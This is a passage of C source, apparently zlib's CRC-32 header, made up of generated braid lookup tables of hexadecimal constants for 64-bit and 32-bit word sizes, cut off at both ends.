0xea98814200000000, 0x85d424d900000000, 0x7506baae00000000, 0x1a4a1f3500000000, 0x95a3874100000000, 0xfaef22da00000000, 0x0a3dbcad00000000, 0x6571193600000000}, {0x0000000000000000, 0x85d996dd00000000, 0x4bb55c6000000000, 0xce6ccabd00000000, 0x966ab9c000000000, 0x13b32f1d00000000, 0xdddfe5a000000000, 0x5806737d00000000, 0x6dd3035a00000000, 0xe80a958700000000, 0x26665f3a00000000, 0xa3bfc9e700000000, 0xfbb9ba9a00000000, 0x7e602c4700000000, 0xb00ce6fa00000000, 0x35d5702700000000, 0xdaa607b400000000, 0x5f7f916900000000, 0x91135bd400000000, 0x14cacd0900000000, 0x4cccbe7400000000, 0xc91528a900000000, 0x0779e21400000000, 0x82a074c900000000, 0xb77504ee00000000, 0x32ac923300000000, 0xfcc0588e00000000, 0x7919ce5300000000, 0x211fbd2e00000000, 0xa4c62bf300000000, 0x6aaae14e00000000, 0xef73779300000000, 0xf54b7eb300000000, 0x7092e86e00000000, 0xbefe22d300000000, 0x3b27b40e00000000, 0x6321c77300000000, 0xe6f851ae00000000, 0x28949b1300000000, 0xad4d0dce00000000, 0x98987de900000000, 0x1d41eb3400000000, 0xd32d218900000000, 0x56f4b75400000000, 0x0ef2c42900000000, 0x8b2b52f400000000, 0x4547984900000000, 0xc09e0e9400000000, 0x2fed790700000000, 0xaa34efda00000000, 0x6458256700000000, 0xe181b3ba00000000, 0xb987c0c700000000, 0x3c5e561a00000000, 0xf2329ca700000000, 0x77eb0a7a00000000, 0x423e7a5d00000000, 0xc7e7ec8000000000, 0x098b263d00000000, 0x8c52b0e000000000, 0xd454c39d00000000, 0x518d554000000000, 0x9fe19ffd00000000, 0x1a38092000000000, 0xab918dbd00000000, 0x2e481b6000000000, 0xe024d1dd00000000, 0x65fd470000000000, 0x3dfb347d00000000, 0xb822a2a000000000, 0x764e681d00000000, 0xf397fec000000000, 0xc6428ee700000000, 0x439b183a00000000, 0x8df7d28700000000, 0x082e445a00000000, 0x5028372700000000, 0xd5f1a1fa00000000, 0x1b9d6b4700000000, 0x9e44fd9a00000000, 0x71378a0900000000, 0xf4ee1cd400000000, 0x3a82d66900000000, 0xbf5b40b400000000, 0xe75d33c900000000, 0x6284a51400000000, 0xace86fa900000000, 0x2931f97400000000, 0x1ce4895300000000, 0x993d1f8e00000000, 0x5751d53300000000, 0xd28843ee00000000, 0x8a8e309300000000, 0x0f57a64e00000000, 0xc13b6cf300000000, 0x44e2fa2e00000000, 0x5edaf30e00000000, 0xdb0365d300000000, 0x156faf6e00000000, 0x90b639b300000000, 0xc8b04ace00000000, 0x4d69dc1300000000, 0x830516ae00000000, 0x06dc807300000000, 0x3309f05400000000, 0xb6d0668900000000, 0x78bcac3400000000, 0xfd653ae900000000, 0xa563499400000000, 0x20badf4900000000, 0xeed615f400000000, 0x6b0f832900000000, 0x847cf4ba00000000, 0x01a5626700000000, 0xcfc9a8da00000000, 0x4a103e0700000000, 0x12164d7a00000000, 0x97cfdba700000000, 0x59a3111a00000000, 0xdc7a87c700000000, 0xe9aff7e000000000, 0x6c76613d00000000, 0xa21aab8000000000, 0x27c33d5d00000000, 0x7fc54e2000000000, 0xfa1cd8fd00000000, 0x3470124000000000, 0xb1a9849d00000000, 0x17256aa000000000, 0x92fcfc7d00000000, 0x5c9036c000000000, 0xd949a01d00000000, 0x814fd36000000000, 0x049645bd00000000, 0xcafa8f0000000000, 0x4f2319dd00000000, 0x7af669fa00000000, 0xff2fff2700000000, 0x3143359a00000000, 0xb49aa34700000000, 0xec9cd03a00000000, 0x694546e700000000, 0xa7298c5a00000000, 0x22f01a8700000000, 0xcd836d1400000000, 0x485afbc900000000, 0x8636317400000000, 0x03efa7a900000000, 0x5be9d4d400000000, 0xde30420900000000, 0x105c88b400000000, 0x95851e6900000000, 0xa0506e4e00000000, 0x2589f89300000000, 0xebe5322e00000000, 0x6e3ca4f300000000, 0x363ad78e00000000, 0xb3e3415300000000, 0x7d8f8bee00000000, 0xf8561d3300000000, 0xe26e141300000000, 0x67b782ce00000000, 0xa9db487300000000, 0x2c02deae00000000, 0x7404add300000000, 0xf1dd3b0e00000000, 0x3fb1f1b300000000, 0xba68676e00000000, 0x8fbd174900000000, 0x0a64819400000000, 0xc4084b2900000000, 0x41d1ddf400000000, 0x19d7ae8900000000, 0x9c0e385400000000, 0x5262f2e900000000, 0xd7bb643400000000, 0x38c813a700000000, 0xbd11857a00000000, 0x737d4fc700000000, 0xf6a4d91a00000000, 0xaea2aa6700000000, 0x2b7b3cba00000000, 0xe517f60700000000, 0x60ce60da00000000, 0x551b10fd00000000, 0xd0c2862000000000, 0x1eae4c9d00000000, 0x9b77da4000000000, 0xc371a93d00000000, 0x46a83fe000000000, 0x88c4f55d00000000, 0x0d1d638000000000, 0xbcb4e71d00000000, 0x396d71c000000000, 0xf701bb7d00000000, 0x72d82da000000000, 0x2ade5edd00000000, 0xaf07c80000000000, 0x616b02bd00000000, 0xe4b2946000000000, 0xd167e44700000000, 0x54be729a00000000, 0x9ad2b82700000000, 0x1f0b2efa00000000, 0x470d5d8700000000, 0xc2d4cb5a00000000, 0x0cb801e700000000, 0x8961973a00000000, 0x6612e0a900000000, 0xe3cb767400000000, 0x2da7bcc900000000, 0xa87e2a1400000000, 0xf078596900000000, 0x75a1cfb400000000, 0xbbcd050900000000, 0x3e1493d400000000, 0x0bc1e3f300000000, 0x8e18752e00000000, 0x4074bf9300000000, 0xc5ad294e00000000, 0x9dab5a3300000000, 0x1872ccee00000000, 0xd61e065300000000, 0x53c7908e00000000, 0x49ff99ae00000000, 0xcc260f7300000000, 0x024ac5ce00000000, 0x8793531300000000, 0xdf95206e00000000, 0x5a4cb6b300000000, 0x94207c0e00000000, 0x11f9ead300000000, 0x242c9af400000000, 0xa1f50c2900000000, 0x6f99c69400000000, 0xea40504900000000, 0xb246233400000000, 0x379fb5e900000000, 0xf9f37f5400000000, 0x7c2ae98900000000, 0x93599e1a00000000, 0x168008c700000000, 0xd8ecc27a00000000, 0x5d3554a700000000, 0x053327da00000000, 0x80eab10700000000, 0x4e867bba00000000, 0xcb5fed6700000000, 0xfe8a9d4000000000, 0x7b530b9d00000000, 0xb53fc12000000000, 0x30e657fd00000000, 0x68e0248000000000, 0xed39b25d00000000, 0x235578e000000000, 0xa68cee3d00000000}, {0x0000000000000000, 0x76e10f9d00000000, 0xadc46ee100000000, 0xdb25617c00000000, 0x1b8fac1900000000, 0x6d6ea38400000000, 0xb64bc2f800000000, 0xc0aacd6500000000, 0x361e593300000000, 0x40ff56ae00000000, 0x9bda37d200000000, 0xed3b384f00000000, 0x2d91f52a00000000, 0x5b70fab700000000, 0x80559bcb00000000, 0xf6b4945600000000, 0x6c3cb26600000000, 0x1addbdfb00000000, 0xc1f8dc8700000000, 0xb719d31a00000000, 0x77b31e7f00000000, 0x015211e200000000, 0xda77709e00000000, 0xac967f0300000000, 0x5a22eb5500000000, 0x2cc3e4c800000000, 0xf7e685b400000000, 0x81078a2900000000, 0x41ad474c00000000, 0x374c48d100000000, 0xec6929ad00000000, 0x9a88263000000000, 0xd87864cd00000000, 0xae996b5000000000, 0x75bc0a2c00000000, 0x035d05b100000000, 0xc3f7c8d400000000, 0xb516c74900000000, 0x6e33a63500000000, 0x18d2a9a800000000, 0xee663dfe00000000, 0x9887326300000000, 0x43a2531f00000000, 0x35435c8200000000, 0xf5e991e700000000, 0x83089e7a00000000, 0x582dff0600000000, 0x2eccf09b00000000, 0xb444d6ab00000000, 0xc2a5d93600000000, 0x1980b84a00000000, 0x6f61b7d700000000, 0xafcb7ab200000000, 0xd92a752f00000000, 0x020f145300000000, 0x74ee1bce00000000, 0x825a8f9800000000, 0xf4bb800500000000, 0x2f9ee17900000000, 0x597feee400000000, 0x99d5238100000000, 0xef342c1c00000000, 0x34114d6000000000, 0x42f042fd00000000, 0xf1f7b94100000000, 0x8716b6dc00000000, 0x5c33d7a000000000, 0x2ad2d83d00000000, 0xea78155800000000, 0x9c991ac500000000, 0x47bc7bb900000000, 0x315d742400000000, 0xc7e9e07200000000, 0xb108efef00000000, 0x6a2d8e9300000000, 0x1ccc810e00000000, 0xdc664c6b00000000, 0xaa8743f600000000, 0x71a2228a00000000, 0x07432d1700000000, 0x9dcb0b2700000000, 0xeb2a04ba00000000, 0x300f65c600000000, 0x46ee6a5b00000000, 0x8644a73e00000000, 0xf0a5a8a300000000, 0x2b80c9df00000000, 0x5d61c64200000000, 0xabd5521400000000, 0xdd345d8900000000, 0x06113cf500000000, 0x70f0336800000000, 0xb05afe0d00000000, 0xc6bbf19000000000, 0x1d9e90ec00000000, 0x6b7f9f7100000000, 0x298fdd8c00000000, 0x5f6ed21100000000, 0x844bb36d00000000, 0xf2aabcf000000000, 0x3200719500000000, 0x44e17e0800000000, 0x9fc41f7400000000, 0xe92510e900000000, 0x1f9184bf00000000, 0x69708b2200000000, 0xb255ea5e00000000, 0xc4b4e5c300000000, 0x041e28a600000000, 0x72ff273b00000000, 0xa9da464700000000, 0xdf3b49da00000000, 0x45b36fea00000000, 0x3352607700000000, 0xe877010b00000000, 0x9e960e9600000000, 0x5e3cc3f300000000, 0x28ddcc6e00000000, 0xf3f8ad1200000000, 0x8519a28f00000000, 0x73ad36d900000000, 0x054c394400000000, 0xde69583800000000, 0xa88857a500000000, 0x68229ac000000000, 0x1ec3955d00000000, 0xc5e6f42100000000, 0xb307fbbc00000000, 0xe2ef738300000000, 0x940e7c1e00000000, 0x4f2b1d6200000000, 0x39ca12ff00000000, 0xf960df9a00000000, 0x8f81d00700000000, 0x54a4b17b00000000, 0x2245bee600000000, 0xd4f12ab000000000, 0xa210252d00000000, 0x7935445100000000, 0x0fd44bcc00000000, 0xcf7e86a900000000, 0xb99f893400000000, 0x62bae84800000000, 0x145be7d500000000, 0x8ed3c1e500000000, 0xf832ce7800000000, 0x2317af0400000000, 0x55f6a09900000000, 0x955c6dfc00000000, 0xe3bd626100000000, 0x3898031d00000000, 0x4e790c8000000000, 0xb8cd98d600000000, 0xce2c974b00000000, 0x1509f63700000000, 0x63e8f9aa00000000, 0xa34234cf00000000, 0xd5a33b5200000000, 0x0e865a2e00000000, 0x786755b300000000, 0x3a97174e00000000, 0x4c7618d300000000, 0x975379af00000000, 0xe1b2763200000000, 0x2118bb5700000000, 0x57f9b4ca00000000, 0x8cdcd5b600000000, 0xfa3dda2b00000000, 0x0c894e7d00000000, 0x7a6841e000000000, 0xa14d209c00000000, 0xd7ac2f0100000000, 0x1706e26400000000, 0x61e7edf900000000, 0xbac28c8500000000, 0xcc23831800000000, 0x56aba52800000000, 0x204aaab500000000, 0xfb6fcbc900000000, 0x8d8ec45400000000, 0x4d24093100000000, 0x3bc506ac00000000, 0xe0e067d000000000, 0x9601684d00000000, 0x60b5fc1b00000000, 0x1654f38600000000, 0xcd7192fa00000000, 0xbb909d6700000000, 0x7b3a500200000000, 0x0ddb5f9f00000000, 0xd6fe3ee300000000, 0xa01f317e00000000, 0x1318cac200000000, 0x65f9c55f00000000, 0xbedca42300000000, 0xc83dabbe00000000, 0x089766db00000000, 0x7e76694600000000, 0xa553083a00000000, 0xd3b207a700000000, 0x250693f100000000, 0x53e79c6c00000000, 0x88c2fd1000000000, 0xfe23f28d00000000, 0x3e893fe800000000, 0x4868307500000000, 0x934d510900000000, 0xe5ac5e9400000000, 0x7f2478a400000000, 0x09c5773900000000, 0xd2e0164500000000, 0xa40119d800000000, 0x64abd4bd00000000, 0x124adb2000000000, 0xc96fba5c00000000, 0xbf8eb5c100000000, 0x493a219700000000, 0x3fdb2e0a00000000, 0xe4fe4f7600000000, 0x921f40eb00000000, 0x52b58d8e00000000, 0x2454821300000000, 0xff71e36f00000000, 0x8990ecf200000000, 0xcb60ae0f00000000, 0xbd81a19200000000, 0x66a4c0ee00000000, 0x1045cf7300000000, 0xd0ef021600000000, 0xa60e0d8b00000000, 0x7d2b6cf700000000, 0x0bca636a00000000, 0xfd7ef73c00000000, 0x8b9ff8a100000000, 0x50ba99dd00000000, 0x265b964000000000, 0xe6f15b2500000000, 0x901054b800000000, 0x4b3535c400000000, 0x3dd43a5900000000, 0xa75c1c6900000000, 0xd1bd13f400000000, 0x0a98728800000000, 0x7c797d1500000000, 0xbcd3b07000000000, 0xca32bfed00000000, 0x1117de9100000000, 0x67f6d10c00000000, 0x9142455a00000000, 0xe7a34ac700000000, 0x3c862bbb00000000, 0x4a67242600000000, 0x8acde94300000000, 0xfc2ce6de00000000, 0x270987a200000000, 0x51e8883f00000000}, {0x0000000000000000, 0xe8dbfbb900000000, 0x91b186a800000000, 0x796a7d1100000000, 0x63657c8a00000000, 0x8bbe873300000000, 0xf2d4fa2200000000, 0x1a0f019b00000000, 0x87cc89cf00000000, 0x6f17727600000000, 0x167d0f6700000000, 0xfea6f4de00000000, 0xe4a9f54500000000, 0x0c720efc00000000, 0x751873ed00000000, 0x9dc3885400000000, 0x4f9f624400000000, 0xa74499fd00000000, 0xde2ee4ec00000000, 0x36f51f5500000000, 0x2cfa1ece00000000, 0xc421e57700000000, 0xbd4b986600000000, 0x559063df00000000, 0xc853eb8b00000000, 0x2088103200000000, 0x59e26d2300000000, 0xb139969a00000000, 0xab36970100000000, 0x43ed6cb800000000, 0x3a8711a900000000, 0xd25cea1000000000, 0x9e3ec58800000000, 0x76e53e3100000000, 0x0f8f432000000000, 0xe754b89900000000, 0xfd5bb90200000000, 0x158042bb00000000, 0x6cea3faa00000000, 0x8431c41300000000, 0x19f24c4700000000, 0xf129b7fe00000000, 0x8843caef00000000, 0x6098315600000000, 0x7a9730cd00000000, 0x924ccb7400000000, 0xeb26b66500000000, 0x03fd4ddc00000000, 0xd1a1a7cc00000000, 0x397a5c7500000000, 0x4010216400000000, 0xa8cbdadd00000000, 0xb2c4db4600000000, 0x5a1f20ff00000000, 0x23755dee00000000, 0xcbaea65700000000, 0x566d2e0300000000, 0xbeb6d5ba00000000, 0xc7dca8ab00000000, 0x2f07531200000000, 0x3508528900000000, 0xddd3a93000000000, 0xa4b9d42100000000, 0x4c622f9800000000, 0x7d7bfbca00000000, 0x95a0007300000000, 0xecca7d6200000000, 0x041186db00000000, 0x1e1e874000000000, 0xf6c57cf900000000, 0x8faf01e800000000, 0x6774fa5100000000, 0xfab7720500000000, 0x126c89bc00000000, 0x6b06f4ad00000000, 0x83dd0f1400000000, 0x99d20e8f00000000, 0x7109f53600000000, 0x0863882700000000, 0xe0b8739e00000000, 0x32e4998e00000000, 0xda3f623700000000, 0xa3551f2600000000, 0x4b8ee49f00000000, 0x5181e50400000000, 0xb95a1ebd00000000, 0xc03063ac00000000, 0x28eb981500000000, 0xb528104100000000, 0x5df3ebf800000000, 0x249996e900000000, 0xcc426d5000000000, 0xd64d6ccb00000000, 0x3e96977200000000, 0x47fcea6300000000, 0xaf2711da00000000, 0xe3453e4200000000, 0x0b9ec5fb00000000, 0x72f4b8ea00000000, 0x9a2f435300000000, 0x802042c800000000, 0x68fbb97100000000, 0x1191c46000000000, 0xf94a3fd900000000, 0x6489b78d00000000, 0x8c524c3400000000, 0xf538312500000000, 0x1de3ca9c00000000, 0x07eccb0700000000, 0xef3730be00000000, 0x965d4daf00000000, 0x7e86b61600000000, 0xacda5c0600000000, 0x4401a7bf00000000, 0x3d6bdaae00000000, 0xd5b0211700000000, 0xcfbf208c00000000, 0x2764db3500000000, 0x5e0ea62400000000, 0xb6d55d9d00000000, 0x2b16d5c900000000, 0xc3cd2e7000000000, 0xbaa7536100000000, 0x527ca8d800000000, 0x4873a94300000000, 0xa0a852fa00000000, 0xd9c22feb00000000, 0x3119d45200000000, 0xbbf0874e00000000, 0x532b7cf700000000, 0x2a4101e600000000, 0xc29afa5f00000000, 0xd895fbc400000000, 0x304e007d00000000, 0x49247d6c00000000, 0xa1ff86d500000000, 0x3c3c0e8100000000, 0xd4e7f53800000000, 0xad8d882900000000, 0x4556739000000000, 0x5f59720b00000000, 0xb78289b200000000, 0xcee8f4a300000000, 0x26330f1a00000000, 0xf46fe50a00000000, 0x1cb41eb300000000, 0x65de63a200000000, 0x8d05981b00000000, 0x970a998000000000, 0x7fd1623900000000, 0x06bb1f2800000000, 0xee60e49100000000, 0x73a36cc500000000, 0x9b78977c00000000, 0xe212ea6d00000000, 0x0ac911d400000000, 0x10c6104f00000000, 0xf81debf600000000, 0x817796e700000000, 0x69ac6d5e00000000, 0x25ce42c600000000, 0xcd15b97f00000000, 0xb47fc46e00000000, 0x5ca43fd700000000, 0x46ab3e4c00000000, 0xae70c5f500000000, 0xd71ab8e400000000, 0x3fc1435d00000000, 0xa202cb0900000000, 0x4ad930b000000000, 0x33b34da100000000, 0xdb68b61800000000, 0xc167b78300000000, 0x29bc4c3a00000000, 0x50d6312b00000000, 0xb80dca9200000000, 0x6a51208200000000, 0x828adb3b00000000, 0xfbe0a62a00000000, 0x133b5d9300000000, 0x09345c0800000000, 0xe1efa7b100000000, 0x9885daa000000000, 0x705e211900000000, 0xed9da94d00000000, 0x054652f400000000, 0x7c2c2fe500000000, 0x94f7d45c00000000, 0x8ef8d5c700000000, 0x66232e7e00000000, 0x1f49536f00000000, 0xf792a8d600000000, 0xc68b7c8400000000, 0x2e50873d00000000, 0x573afa2c00000000, 0xbfe1019500000000, 0xa5ee000e00000000, 0x4d35fbb700000000, 0x345f86a600000000, 0xdc847d1f00000000, 0x4147f54b00000000, 0xa99c0ef200000000, 0xd0f673e300000000, 0x382d885a00000000, 0x222289c100000000, 0xcaf9727800000000, 0xb3930f6900000000, 0x5b48f4d000000000, 0x89141ec000000000, 0x61cfe57900000000, 0x18a5986800000000, 0xf07e63d100000000, 0xea71624a00000000, 0x02aa99f300000000, 0x7bc0e4e200000000, 0x931b1f5b00000000, 0x0ed8970f00000000, 0xe6036cb600000000, 0x9f6911a700000000, 0x77b2ea1e00000000, 0x6dbdeb8500000000, 0x8566103c00000000, 0xfc0c6d2d00000000, 0x14d7969400000000, 0x58b5b90c00000000, 0xb06e42b500000000, 0xc9043fa400000000, 0x21dfc41d00000000, 0x3bd0c58600000000, 0xd30b3e3f00000000, 0xaa61432e00000000, 0x42bab89700000000, 0xdf7930c300000000, 0x37a2cb7a00000000, 0x4ec8b66b00000000, 0xa6134dd200000000, 0xbc1c4c4900000000, 0x54c7b7f000000000, 0x2dadcae100000000, 0xc576315800000000, 0x172adb4800000000, 0xfff120f100000000, 0x869b5de000000000, 0x6e40a65900000000, 0x744fa7c200000000, 0x9c945c7b00000000, 0xe5fe216a00000000, 0x0d25dad300000000, 0x90e6528700000000, 0x783da93e00000000, 0x0157d42f00000000, 0xe98c2f9600000000, 0xf3832e0d00000000, 0x1b58d5b400000000, 0x6232a8a500000000, 0x8ae9531c00000000}, {0x0000000000000000, 0x919168ae00000000, 0x6325a08700000000, 0xf2b4c82900000000, 0x874c31d400000000, 0x16dd597a00000000, 0xe469915300000000, 0x75f8f9fd00000000, 0x4f9f137300000000, 0xde0e7bdd00000000, 0x2cbab3f400000000, 0xbd2bdb5a00000000, 0xc8d322a700000000, 0x59424a0900000000, 0xabf6822000000000, 0x3a67ea8e00000000, 0x9e3e27e600000000, 0x0faf4f4800000000, 0xfd1b876100000000, 0x6c8aefcf00000000, 0x1972163200000000, 0x88e37e9c00000000, 0x7a57b6b500000000, 0xebc6de1b00000000, 0xd1a1349500000000, 0x40305c3b00000000, 0xb284941200000000, 0x2315fcbc00000000, 0x56ed054100000000, 0xc77c6def00000000, 0x35c8a5c600000000, 0xa459cd6800000000, 0x7d7b3f1700000000, 0xecea57b900000000, 0x1e5e9f9000000000, 0x8fcff73e00000000, 0xfa370ec300000000, 0x6ba6666d00000000, 0x9912ae4400000000, 0x0883c6ea00000000, 0x32e42c6400000000, 0xa37544ca00000000, 0x51c18ce300000000, 0xc050e44d00000000, 0xb5a81db000000000, 0x2439751e00000000, 0xd68dbd3700000000, 0x471cd59900000000, 0xe34518f100000000, 0x72d4705f00000000, 0x8060b87600000000, 0x11f1d0d800000000, 0x6409292500000000, 0xf598418b00000000, 0x072c89a200000000, 0x96bde10c00000000, 0xacda0b8200000000, 0x3d4b632c00000000, 0xcfffab0500000000, 0x5e6ec3ab00000000, 0x2b963a5600000000, 0xba0752f800000000, 0x48b39ad100000000, 0xd922f27f00000000, 0xfaf67e2e00000000, 0x6b67168000000000, 0x99d3dea900000000, 0x0842b60700000000, 0x7dba4ffa00000000, 0xec2b275400000000, 0x1e9fef7d00000000, 0x8f0e87d300000000, 0xb5696d5d00000000, 0x24f805f300000000, 0xd64ccdda00000000, 0x47dda57400000000, 0x32255c8900000000, 0xa3b4342700000000, 0x5100fc0e00000000, 0xc09194a000000000, 0x64c859c800000000, 0xf559316600000000, 0x07edf94f00000000, 0x967c91e100000000, 0xe384681c00000000, 0x721500b200000000, 0x80a1c89b00000000, 0x1130a03500000000, 0x2b574abb00000000, 0xbac6221500000000, 0x4872ea3c00000000, 0xd9e3829200000000, 0xac1b7b6f00000000, 0x3d8a13c100000000, 0xcf3edbe800000000, 0x5eafb34600000000, 0x878d413900000000, 0x161c299700000000, 0xe4a8e1be00000000, 0x7539891000000000, 0x00c170ed00000000, 0x9150184300000000, 0x63e4d06a00000000, 0xf275b8c400000000, 0xc812524a00000000, 0x59833ae400000000, 0xab37f2cd00000000, 0x3aa69a6300000000, 0x4f5e639e00000000, 0xdecf0b3000000000, 0x2c7bc31900000000, 0xbdeaabb700000000, 0x19b366df00000000, 0x88220e7100000000, 0x7a96c65800000000, 0xeb07aef600000000, 0x9eff570b00000000, 0x0f6e3fa500000000, 0xfddaf78c00000000, 0x6c4b9f2200000000, 0x562c75ac00000000, 0xc7bd1d0200000000, 0x3509d52b00000000, 0xa498bd8500000000, 0xd160447800000000, 0x40f12cd600000000, 0xb245e4ff00000000, 0x23d48c5100000000, 0xf4edfd5c00000000, 0x657c95f200000000, 0x97c85ddb00000000, 0x0659357500000000, 0x73a1cc8800000000, 0xe230a42600000000, 0x10846c0f00000000, 0x811504a100000000, 0xbb72ee2f00000000, 0x2ae3868100000000, 0xd8574ea800000000, 0x49c6260600000000, 0x3c3edffb00000000, 0xadafb75500000000, 0x5f1b7f7c00000000, 0xce8a17d200000000, 0x6ad3daba00000000, 0xfb42b21400000000, 0x09f67a3d00000000, 0x9867129300000000, 0xed9feb6e00000000, 0x7c0e83c000000000, 0x8eba4be900000000, 0x1f2b234700000000, 0x254cc9c900000000, 0xb4dda16700000000, 0x4669694e00000000, 0xd7f801e000000000, 0xa200f81d00000000, 0x339190b300000000, 0xc125589a00000000, 0x50b4303400000000, 0x8996c24b00000000, 0x1807aae500000000, 0xeab362cc00000000, 0x7b220a6200000000, 0x0edaf39f00000000, 0x9f4b9b3100000000, 0x6dff531800000000, 0xfc6e3bb600000000, 0xc609d13800000000, 0x5798b99600000000, 0xa52c71bf00000000, 0x34bd191100000000, 0x4145e0ec00000000, 0xd0d4884200000000, 0x2260406b00000000, 0xb3f128c500000000, 0x17a8e5ad00000000, 0x86398d0300000000, 0x748d452a00000000, 0xe51c2d8400000000, 0x90e4d47900000000, 0x0175bcd700000000, 0xf3c174fe00000000, 0x62501c5000000000, 0x5837f6de00000000, 0xc9a69e7000000000, 0x3b12565900000000, 0xaa833ef700000000, 0xdf7bc70a00000000, 0x4eeaafa400000000, 0xbc5e678d00000000, 0x2dcf0f2300000000, 0x0e1b837200000000, 0x9f8aebdc00000000, 0x6d3e23f500000000, 0xfcaf4b5b00000000, 0x8957b2a600000000, 0x18c6da0800000000, 0xea72122100000000, 0x7be37a8f00000000, 0x4184900100000000, 0xd015f8af00000000, 0x22a1308600000000, 0xb330582800000000, 0xc6c8a1d500000000, 0x5759c97b00000000, 0xa5ed015200000000, 0x347c69fc00000000, 0x9025a49400000000, 0x01b4cc3a00000000, 0xf300041300000000, 0x62916cbd00000000, 0x1769954000000000, 0x86f8fdee00000000, 0x744c35c700000000, 0xe5dd5d6900000000, 0xdfbab7e700000000, 0x4e2bdf4900000000, 0xbc9f176000000000, 0x2d0e7fce00000000, 0x58f6863300000000, 0xc967ee9d00000000, 0x3bd326b400000000, 0xaa424e1a00000000, 0x7360bc6500000000, 0xe2f1d4cb00000000, 0x10451ce200000000, 0x81d4744c00000000, 0xf42c8db100000000, 0x65bde51f00000000, 0x97092d3600000000, 0x0698459800000000, 0x3cffaf1600000000, 0xad6ec7b800000000, 0x5fda0f9100000000, 0xce4b673f00000000, 0xbbb39ec200000000, 0x2a22f66c00000000, 0xd8963e4500000000, 0x490756eb00000000, 0xed5e9b8300000000, 0x7ccff32d00000000, 0x8e7b3b0400000000, 0x1fea53aa00000000, 0x6a12aa5700000000, 0xfb83c2f900000000, 0x09370ad000000000, 0x98a6627e00000000, 0xa2c188f000000000, 0x3350e05e00000000, 0xc1e4287700000000, 0x507540d900000000, 0x258db92400000000, 0xb41cd18a00000000, 0x46a819a300000000, 0xd739710d00000000}}; #else /* W == 4 */ local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0xccaa009e, 0x4225077d, 0x8e8f07e3, 0x844a0efa, 0x48e00e64, 0xc66f0987, 0x0ac50919, 0xd3e51bb5, 0x1f4f1b2b, 0x91c01cc8, 0x5d6a1c56, 0x57af154f, 0x9b0515d1, 0x158a1232, 0xd92012ac, 0x7cbb312b, 0xb01131b5, 0x3e9e3656, 0xf23436c8, 0xf8f13fd1, 0x345b3f4f, 0xbad438ac, 0x767e3832, 0xaf5e2a9e, 0x63f42a00, 0xed7b2de3, 0x21d12d7d, 0x2b142464, 0xe7be24fa, 0x69312319, 0xa59b2387, 0xf9766256, 0x35dc62c8, 0xbb53652b, 0x77f965b5, 0x7d3c6cac, 0xb1966c32, 0x3f196bd1, 0xf3b36b4f, 0x2a9379e3, 0xe639797d, 0x68b67e9e, 0xa41c7e00, 0xaed97719, 0x62737787, 0xecfc7064, 0x205670fa, 0x85cd537d, 0x496753e3, 0xc7e85400, 0x0b42549e, 0x01875d87, 0xcd2d5d19, 0x43a25afa, 0x8f085a64, 0x562848c8, 0x9a824856, 0x140d4fb5, 0xd8a74f2b, 0xd2624632, 0x1ec846ac, 0x9047414f, 0x5ced41d1, 0x299dc2ed, 0xe537c273, 0x6bb8c590, 0xa712c50e, 0xadd7cc17, 0x617dcc89, 0xeff2cb6a, 0x2358cbf4, 0xfa78d958, 0x36d2d9c6, 0xb85dde25, 0x74f7debb, 0x7e32d7a2, 0xb298d73c, 0x3c17d0df, 0xf0bdd041, 0x5526f3c6, 0x998cf358, 0x1703f4bb, 0xdba9f425, 0xd16cfd3c, 0x1dc6fda2, 0x9349fa41, 0x5fe3fadf, 0x86c3e873, 0x4a69e8ed, 0xc4e6ef0e, 0x084cef90, 0x0289e689, 0xce23e617, 0x40ace1f4, 0x8c06e16a, 0xd0eba0bb, 0x1c41a025, 0x92cea7c6, 0x5e64a758, 0x54a1ae41, 0x980baedf, 0x1684a93c, 0xda2ea9a2, 0x030ebb0e, 0xcfa4bb90, 0x412bbc73, 0x8d81bced, 0x8744b5f4, 0x4beeb56a, 0xc561b289, 0x09cbb217, 0xac509190, 0x60fa910e, 0xee7596ed, 0x22df9673, 0x281a9f6a, 0xe4b09ff4, 0x6a3f9817, 0xa6959889, 0x7fb58a25, 0xb31f8abb, 0x3d908d58, 0xf13a8dc6, 0xfbff84df, 0x37558441, 0xb9da83a2, 0x7570833c, 0x533b85da, 0x9f918544, 0x111e82a7, 0xddb48239, 0xd7718b20, 0x1bdb8bbe, 0x95548c5d, 0x59fe8cc3, 0x80de9e6f, 0x4c749ef1, 0xc2fb9912, 0x0e51998c, 0x04949095, 0xc83e900b, 0x46b197e8, 0x8a1b9776, 0x2f80b4f1, 0xe32ab46f, 0x6da5b38c, 0xa10fb312, 0xabcaba0b, 0x6760ba95, 0xe9efbd76, 0x2545bde8, 0xfc65af44, 0x30cfafda, 0xbe40a839, 0x72eaa8a7, 0x782fa1be, 0xb485a120, 0x3a0aa6c3, 0xf6a0a65d, 0xaa4de78c, 0x66e7e712, 0xe868e0f1, 0x24c2e06f, 0x2e07e976, 0xe2ade9e8, 0x6c22ee0b, 0xa088ee95, 0x79a8fc39, 0xb502fca7, 0x3b8dfb44, 0xf727fbda, 0xfde2f2c3, 0x3148f25d, 0xbfc7f5be, 0x736df520, 0xd6f6d6a7, 0x1a5cd639, 0x94d3d1da, 0x5879d144, 0x52bcd85d, 0x9e16d8c3, 0x1099df20, 0xdc33dfbe, 0x0513cd12, 0xc9b9cd8c, 0x4736ca6f, 0x8b9ccaf1, 0x8159c3e8, 0x4df3c376, 0xc37cc495, 0x0fd6c40b, 0x7aa64737, 0xb60c47a9, 0x3883404a, 0xf42940d4, 0xfeec49cd, 0x32464953, 0xbcc94eb0, 0x70634e2e, 0xa9435c82, 0x65e95c1c, 0xeb665bff, 0x27cc5b61, 0x2d095278, 0xe1a352e6, 0x6f2c5505, 0xa386559b, 0x061d761c, 0xcab77682, 0x44387161, 0x889271ff, 0x825778e6, 0x4efd7878, 0xc0727f9b, 0x0cd87f05, 0xd5f86da9, 0x19526d37, 0x97dd6ad4, 0x5b776a4a, 0x51b26353, 0x9d1863cd, 0x1397642e, 0xdf3d64b0, 0x83d02561, 0x4f7a25ff, 0xc1f5221c, 0x0d5f2282, 0x079a2b9b, 0xcb302b05, 0x45bf2ce6, 0x89152c78, 0x50353ed4, 0x9c9f3e4a, 0x121039a9, 0xdeba3937, 0xd47f302e, 0x18d530b0, 0x965a3753, 0x5af037cd, 0xff6b144a, 0x33c114d4, 0xbd4e1337, 0x71e413a9, 0x7b211ab0, 0xb78b1a2e, 0x39041dcd, 0xf5ae1d53, 0x2c8e0fff, 0xe0240f61, 0x6eab0882, 0xa201081c, 0xa8c40105, 0x646e019b, 0xeae10678, 0x264b06e6}, 